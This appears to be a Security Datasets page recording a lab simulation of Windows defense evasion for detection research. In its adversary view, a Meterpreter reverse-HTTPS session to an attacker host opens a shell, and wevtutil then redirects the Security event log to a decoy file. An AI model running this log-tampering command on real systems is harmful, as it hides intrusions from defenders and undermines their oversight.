Modifying Security Event Log File Path via Modification of Log Configuration#

Metadata#


Contributors	Jose Rodriguez @Cyb3rPandaH
Creation Date	2022/07/05
Modification Date	2022/07/05
Tactics	TA0005
Techniques	T1562.002
Tags	wevtutil,cmd,microsoft windows security auditing

Dataset Description#

After getting a shell with elevated privileges on the target, we used wevtutil.exe to modify the configuration of the Security event log. Event logs for Microsoft Windows Security Auditing are stored in a different file (Not-Important-Log.evtx) by changing the standard log path C:\Windows\System32\Winevt\Logs\Security.evtx. This dataset was generated using a Windows 10 Enterprise Evaluation edition (Version:21H1,OS Build:19043.1766) and Kali Linux (Version:2021.3).

Datasets Downloads#

Type	Link
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_wevtutil_modify_security_eventlog_path.zip

Simulation Metadata#

Tools#

type	Name	Module
Manual	cmd	cmd

Adversary View#

msf6 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://10.0.10.104:8443
[*] https://10.0.10.104:8443 handling request from 10.0.10.102; (UUID: if81stxw) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 2 opened (10.0.10.104:8443 -> 127.0.0.1) at 2022-07-05 17:00:38 -0400

meterpreter > shell
Process 1912 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19043.1766]
(c) Microsoft Corporation. All rights reserved.

C:\Users\pedro\Downloads>wevtutil get-log Security
wevtutil get-log Security
name: Security
enabled: true
type: Admin
owningPublisher: 
isolation: Custom
channelAccess: O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)
logging:
  logFileName: %SystemRoot%\System32\Winevt\Logs\Security.evtx
  retention: false
  autoBackup: false
  maxSize: 1000000000
publishing:
  fileMax: 1

C:\Users\pedro\Downloads>wevtutil set-log Security /logfilename:"C:\Windows\System32\winevt\Not-Important-Log.evtx"
wevtutil set-log Security /logfilename:"C:\Windows\System32\winevt\Not-Important-Log.evtx"

C:\Users\pedro\Downloads>wevtutil get-log Security
wevtutil get-log Security
name: Security
enabled: true
type: Admin
owningPublisher: 
isolation: Custom
channelAccess: O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)
logging:
  logFileName: C:\Windows\System32\winevt\Not-Important-Log.evtx
  retention: false
  autoBackup: false
  maxSize: 1000000000
publishing:
  fileMax: 1

C:\Users\pedro\Downloads>

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_wevtutil_modify_security_eventlog_path.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)

References#

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil

Security Datasets

Modifying Security Event Log File Path via Modification of Log Configuration

Contents